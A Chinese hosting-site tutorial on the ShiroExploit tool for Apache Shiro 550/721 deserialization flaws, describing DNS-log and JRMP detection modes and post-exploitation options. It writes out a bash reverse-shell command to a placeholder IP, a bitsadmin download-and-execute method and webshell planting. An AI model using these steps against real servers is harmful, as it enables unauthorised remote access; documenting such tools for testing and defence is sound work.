您好,登录后才能下订单哦!
密码登录
            
            
            
            
        登录注册
            
            
            
        点击 登录注册 即表示同意《亿速云用户服务条款》
        本篇内容主要讲解“Shiro漏洞检测工具ShiroExploit怎么使用”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“Shiro漏洞检测工具ShiroExploit怎么使用”吧!
支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持简单回显。
Shiro550 无需提供rememberMe Cookie, Shiro721 需要提供一个有效的rememberMe CookieShiro550 无需选择操作系统类型, Shiro721 需要选择操作系统类型
 
 使用 ceye.io 进行漏洞检测URLDNS  筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload使用 dnslog.cn 进行漏洞检测dnslog.cn  申请一个 DNS Record。URLDNS  筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload使用 JRMP + dnslog 进行漏洞检测java -cp ShiroExploit.jar com.shiroexploit.server.BasicHTTPServer [HttpSerivce Port] [JRMPListener Port] 开启HttpService/JRMPListener,并按照要求填入相应 IP 和端口HTTPService  默认监听  8080  端口, JRMPListener  默认监听  8088  端口JRMP  的方式进行漏洞检测,可以显著减小 cookie 大小URLDNS  筛选出唯一 Key,然后使用  JRMP  依次为各个 Gadget 生成对应的 JRMPListener使用回显进行漏洞检测https://blog.csdn.net/fnmsd/article/details/106709736  介绍的方式实现回显,在本地可以测试成功,但是在实际环境中基本不成功(可能是我的姿势有问题,欢迎探讨),所以目前是通过读写文件的方式实现回显,后期可能会加入其它方式反弹shell(linux)  采用  bash -i >& /dev/tcp/1.2.3.4/443 0>&1  的方式反弹 shell反弹shell(Windows)  采用  bitsadmin  下载指定 URL 的 exe 文件并执行的方式获取 shell
 
 获取Webshell  可以在能够回显的情况下直接在使用者给出的路径(目录需要真实存在)下写入 webshell, webshell 名称和后缀名由使用者自行指定,webshell 的内容从 config 目录下的 shell.jsp 中读取
 
 到此,相信大家对“Shiro漏洞检测工具ShiroExploit怎么使用”有了更深的了解,不妨来实际操作一番吧!这里是亿速云网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。